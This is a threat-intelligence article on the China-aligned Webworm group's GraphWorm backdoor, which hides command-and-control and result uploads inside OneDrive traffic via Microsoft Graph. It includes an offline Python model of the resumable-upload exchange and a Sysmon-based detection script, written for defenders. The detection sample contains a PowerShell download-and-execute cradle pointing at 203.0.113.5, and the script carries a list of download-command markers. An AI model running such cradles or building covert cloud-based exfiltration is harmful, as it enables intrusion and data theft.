A China-aligned threat group tracked as Webworm has deployed a new Go-based backdoor, GraphWorm (also referred to as OverOneDrive), that routes all of its command-and-control traffic through Microsoft OneDrive by way of the Microsoft Graph API. Because every exchange is an ordinary Graph call to a Microsoft host over TLS, the traffic blends in with legitimate cloud storage use instead of standing out as C2. ESET researchers, publishing on WeLiveSecurity, identified the malware; their findings, as reported by Cyber Security News, show how the group has moved beyond previously used tools such as McRat and Trochilus.
Webworm has been active since at least 2017 and has significantly widened its targeting. Initially focused on organizations in Asia, the group now also pursues government bodies in Belgium, Italy, Serbia and Poland, as well as targets in South Africa. For initial access it relies on open-source reconnaissance tools, including the Nuclei vulnerability scanner and the dirsearch web path brute-forcer, and has been observed exploiting a post-authentication remote code execution vulnerability in SquirrelMail on exposed webmail installations. Since the flaw is post-authentication, the attackers must already hold valid webmail credentials when they use it, which points to credential theft or reuse as a preceding step.
GraphWorm is written in Go. It derives a per-victim identifier from network adapter details, processor information and device serial numbers, and creates a dedicated OneDrive folder for each compromised machine with three subfolders: one for file storage, one from which commands are fetched, and one to which results are written. The supported commands cover uploading and downloading files, running shell commands via cmd.exe, and changing the beacon sleep interval. Command output is written to a file named beaconshelloutput.txt and pushed back to OneDrive through the Graph createUploadSession endpoint, the resumable-upload mechanism Microsoft provides for large files, so even bulky results travel as ordinary chunked OneDrive uploads that a destination-based network sensor has no reason to flag.
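To make the result-upload path concrete, the following is an added example that models the Graph resumable-upload exchange offline. It is not GraphWorm's code and not Microsoft's: the client side builds the documented createUploadSession POST and the Content-Range PUTs, and a small fake server stands in for the upload endpoint so the whole exchange runs without network access. The upload host name (`upload.example.invalid`) and the exact shape of the session response are assumptions; the 320 KiB fragment-unit and 60 MiB fragment-cap rules are Microsoft's documented constraints.

```python
"""Model of the Microsoft Graph resumable-upload exchange that GraphWorm is
reported to use for beaconshelloutput.txt.  Added example, not the malware's
code and not Microsoft's: the client builds the documented requests and
FakeUploadServer stands in for the upload endpoint so it all runs offline.
The upload host name is an assumption."""

FRAGMENT_UNIT = 320 * 1024          # Graph: fragment sizes must be multiples of 320 KiB
MAX_FRAGMENT = 60 * 1024 * 1024     # Graph: and at most 60 MiB per PUT
UPLOAD_URL = "https://upload.example.invalid/session/1"   # assumed; the real uploadUrl is tenant-specific


def create_upload_session_request(drive_path: str) -> dict:
    """First call: POST to graph.microsoft.com, authorised with an OAuth bearer token."""
    return {
        "method": "POST",
        "host": "graph.microsoft.com",
        "path": f"/v1.0/me/drive/root:/{drive_path}:/createUploadSession",
        "body": {"item": {"@microsoft.graph.conflictBehavior": "replace"}},
    }


def fragment_ranges(total: int, fragment: int = FRAGMENT_UNIT) -> list[tuple[int, int]]:
    """Inclusive byte ranges for each PUT, honouring Graph's fragment-size rules."""
    if fragment % FRAGMENT_UNIT or fragment > MAX_FRAGMENT:
        raise ValueError("fragment must be a multiple of 320 KiB and at most 60 MiB")
    return [(start, min(start + fragment, total) - 1) for start in range(0, total, fragment)]


def put_fragment_request(data: bytes, start: int, end: int) -> dict:
    """One resumable-upload PUT; the Content-Range header is what marks it on the wire."""
    return {
        "method": "PUT",
        "url": UPLOAD_URL,
        "headers": {
            "Content-Length": str(end - start + 1),
            "Content-Range": f"bytes {start}-{end}/{len(data)}",
        },
        "body": data[start:end + 1],
    }


class FakeUploadServer:
    """Stand-in for the upload endpoint: accepts fragments in order, answers
    202 + nextExpectedRanges until the last one, then 201 with the item."""

    def __init__(self, total: int, name: str):
        self.total, self.name, self.received = total, name, bytearray()

    def handle_put(self, req: dict) -> dict:
        rng, declared_total = req["headers"]["Content-Range"].removeprefix("bytes ").split("/")
        start, end = (int(x) for x in rng.split("-"))
        if int(declared_total) != self.total or start != len(self.received) or end - start + 1 != len(req["body"]):
            return {"status": 416, "error": "invalidRange"}
        self.received += req["body"]
        if len(self.received) == self.total:
            return {"status": 201, "name": self.name, "size": self.total}
        return {"status": 202, "nextExpectedRanges": [f"{len(self.received)}-{self.total - 1}"]}


def upload(data: bytes, drive_path: str) -> tuple[list[dict], bytes]:
    """Run the full client/server exchange; return (transcript, bytes the server holds)."""
    server = FakeUploadServer(len(data), drive_path.rsplit("/", 1)[-1])
    transcript = [create_upload_session_request(drive_path)]
    transcript.append({"status": 200, "uploadUrl": UPLOAD_URL})      # assumed response shape
    for start, end in fragment_ranges(len(data)):
        req = put_fragment_request(data, start, end)
        resp = server.handle_put(req)
        transcript += [req, resp]
        if resp["status"] >= 400:
            break
    return transcript, bytes(server.received)


if __name__ == "__main__":
    # Constructed payload: 700 KiB of output, i.e. two full fragments and one short one.
    sample = bytes(range(256)) * (700 * 1024 // 256)
    log, stored = upload(sample, "victim-id/results/beaconshelloutput.txt")
    for msg in log:
        print(msg.get("method", ""), msg.get("headers", {}).get("Content-Range", ""), msg.get("status", ""))
    assert stored == sample
```

Two things in the transcript matter to a defender. The session is opened against graph.microsoft.com, but the fragments go to a separate upload URL, so a proxy sees two hosts per result file; and each fragment carries a `Content-Range` header with the total size, so upload volume per client is visible even though the content is encrypted in transit. Neither is malicious on its own; the signal is which process on the endpoint is doing it.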
Beyond GraphWorm, Webworm has built an extensive proxy infrastructure from both open-source and custom tools. These include Wormsrp (a modified build of the open-source frp reverse proxy), ChainWorm (which chains several proxy hops), SmuxProxy (built on the iox port-forwarding tool) and WormSocket (which tunnels traffic over WebSocket connections). The researchers also found that the group used a compromised Amazon S3 bucket to hold configuration files and exfiltrated data, including virtual machine snapshots taken from an Italian government entity and documents from a Spanish government body.
Defenders should not expect to stop this family at the network perimeter: the beacon talks only to Microsoft hosts over TLS, and OneDrive is usually sanctioned, so destination-based blocklists have nothing to act on. Detection has to pair network telemetry with process context. Monitor which processes open connections to Microsoft Graph and OneDrive upload endpoints and alert when the client is not the OneDrive agent, a browser or an Office application; baseline per-host OneDrive volume and timing so steady, beacon-style polling stands out from human use. Audit scheduled tasks and registry Run keys for entries pointing at user-writable paths. Alert on cmd.exe or powershell.exe launched with download commands, and on cmd.exe spawned by an unfamiliar parent binary, since the backdoor runs its shell commands through cmd.exe. Where file telemetry exists, hunt for the literal result filename beaconshelloutput.txt. Given the group's reliance on legitimate cloud infrastructure, behavioral analytics and a cloud access security broker that can see inside sanctioned SaaS sessions are more useful than traditional network signatures.
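The following is an added example, not the researchers' tooling, of what those four checks look like as rules over endpoint telemetry. It runs over constructed Sysmon-style events (EventID 1 process create, 3 network connect, 11 file create, 13 registry value set); field names follow Sysmon's, while the process allowlist, the OneDrive upload-host patterns, the implant path and the IP address in the sample are assumptions made up for the demo.

```python
"""Host-telemetry triage for the GraphWorm tradecraft described above.
Added example, not the researchers' tooling: four rules run over constructed
Sysmon-style events.  Field names follow Sysmon's; the allowlist, upload-host
patterns and sample paths are assumptions and should be tuned per fleet."""
import fnmatch

GRAPH_HOSTS = {"graph.microsoft.com"}
UPLOAD_HOST_PATTERNS = ("*.sharepoint.com", "*.1drv.com")   # assumed OneDrive upload hosts
# Processes expected to talk to Graph/OneDrive on a managed workstation (assumption)
ALLOWED_IMAGES = {"onedrive.exe", "msedge.exe", "chrome.exe", "outlook.exe",
                  "teams.exe", "winword.exe", "excel.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile",
                    "start-bitstransfer", "-urlcache", "bitsadmin /transfer", "curl ", "wget ")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: list[dict]) -> list[str]:
    """Return one finding string per event that matches a rule, in event order."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == 3:  # network connect: which process is talking to Graph / OneDrive?
            host = e.get("DestinationHostname", "").lower()
            cloud = host in GRAPH_HOSTS or any(fnmatch.fnmatch(host, p) for p in UPLOAD_HOST_PATTERNS)
            if cloud and basename(e["Image"]) not in ALLOWED_IMAGES:
                findings.append(f"unexpected-graph-client: {e['Image']} -> {host}")
        elif eid == 11:  # file create: the literal result file name from the report
            if basename(e["TargetFilename"]) == "beaconshelloutput.txt":
                findings.append(f"graphworm-result-file: {e['TargetFilename']} by {e['Image']}")
        elif eid == 1:  # process create: shells pulling content from the internet
            cmdline = e.get("CommandLine", "").lower()
            if basename(e["Image"]) in {"cmd.exe", "powershell.exe"} and any(m in cmdline for m in DOWNLOAD_MARKERS):
                findings.append(f"shell-download: {e['CommandLine']} (parent {e.get('ParentImage', '?')})")
        elif eid == 13:  # registry set: Run-key persistence pointing into user-writable paths
            key, value = e["TargetObject"].lower(), e.get("Details", "").lower()
            if any(k in key for k in RUN_KEYS) and any(p in value for p in USER_WRITABLE):
                findings.append(f"runkey-persistence: {e['TargetObject']} = {e['Details']}")
    return findings


# Constructed sample telemetry: one benign OneDrive connect, one implant-like sequence,
# one benign HKLM Run entry.  Paths, SID and the 203.0.113.5 address are made up.
IMPLANT = r"C:\Users\alice\AppData\Roaming\Microsoft\svchost.exe"
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "DestinationHostname": "graph.microsoft.com"},
    {"EventID": 3, "Image": IMPLANT, "DestinationHostname": "graph.microsoft.com"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": IMPLANT,
     "CommandLine": "cmd.exe /c whoami /all"},
    {"EventID": 11, "Image": IMPLANT,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\beaconshelloutput.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/u')\""},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": IMPLANT},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Note that the cmd.exe event in the sample produces no finding on its own: `whoami` is not a download, and the page gives no command-line signature for the backdoor's shell execution. What makes that event interesting is its parent, an executable under AppData, which is the kind of parent/child relationship a production rule set would score alongside the four checks shown here.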
Source: https://cybersecuritynews.com/graphworm-malware-uses-microsoft-onedrive/


